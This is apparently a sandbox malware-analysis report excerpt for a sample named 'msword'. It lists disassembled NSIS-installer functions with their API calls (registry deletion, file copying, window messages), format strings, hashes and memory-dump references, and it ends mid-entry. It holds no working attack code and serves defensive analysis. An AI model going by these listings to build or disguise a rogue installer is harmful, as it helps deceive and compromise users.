                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                    • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                    • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                    • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                    Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                    • wsprintfW.USER32 ref: 00404457
                                                                    • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s$@rD
                                                                    • API String ID: 3540041739-1813061909
                                                                    • Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                    • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                    • Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                    • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                    Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                    • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                    • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: *?|<>/":
                                                                    • API String ID: 589700163-165019052
                                                                    • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                    • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                    • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                    • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                    Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Close$DeleteEnumOpen
                                                                    • String ID:
                                                                    • API String ID: 1912718029-0
                                                                    • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                    • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                    • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                    • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                    Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                    • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                    • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                    • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                    Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                    • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                    • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                    • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                    Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                    • API String ID: 1697273262-1764544995
                                                                    • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                    • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                    • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                    • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                    Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00404902
                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID: $@rD
                                                                    • API String ID: 3748168415-881980237
                                                                    • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                    • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                    • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                    • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                    Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                      • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                      • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                    • API String ID: 2577523808-3778932970
                                                                    • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                    • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                    • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                    • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                    Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcatwsprintf
                                                                    • String ID: %02x%c$...
                                                                    • API String ID: 3065427908-1057055748
                                                                    • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                    • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                    • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                    • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                    Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 00405057
                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                    • API String ID: 2266616436-4211696005
                                                                    • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                    • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                    • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                    • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                    Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00402100
                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
